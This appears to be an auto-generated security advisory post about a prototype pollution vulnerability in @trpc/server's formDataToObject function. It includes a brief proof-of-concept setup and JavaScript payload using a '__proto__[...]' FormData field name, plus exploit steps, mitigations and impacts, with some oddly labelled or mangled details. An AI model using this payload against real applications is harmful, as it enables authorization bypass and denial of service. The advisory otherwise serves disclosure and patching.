Listen to this Post
The vulnerability exists in the `formDataToObject` function within the `@trpc/server` package, specifically used by the Next.js App Router adapter. When processing form data, the function recursively parses field names using bracket/dot notation to build nested objects. The `set` helper function fails to validate keys, allowing dangerous strings like __proto__, constructor, or `prototype` to be used. An attacker can submit crafted FormData with malicious field names, such as __proto__[bash]. During recursion, `obj[bash]` accesses `Object.prototype` when key is __proto__, assigning properties directly to the prototype. This pollutes all objects in the application, leading to security issues like authorization bypass if code checks for properties on user objects, or denial of service if fundamental object methods are overwritten.
Platform: @trpc/server
Version: >=10.27.0
Vulnerability: Prototype Pollution
Severity: Critical
Date: N/A
Prediction: Patch TBD
What Undercode Say:
Analytics:
mkdir trpc-vuln-poc
cd trpc-vuln-poc
npm init -y
npm install @trpc/[email protected]
const { formDataToObject } = require(‘@trpc/server/unstable-core-do-not-import’);
const fd = new FormData();
fd.append(“__proto__[bash]”, “true”);
const result = formDataToObject(fd);
How Exploit:
Craft malicious FormData.
Submit to tRPC mutation.
Pollute Object.prototype.
Protection from this CVE
Validate input keys.
Use safe recursion.
Sanitize __proto__.
Impact:
Authorization bypass.
Denial of service.
Property injection.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
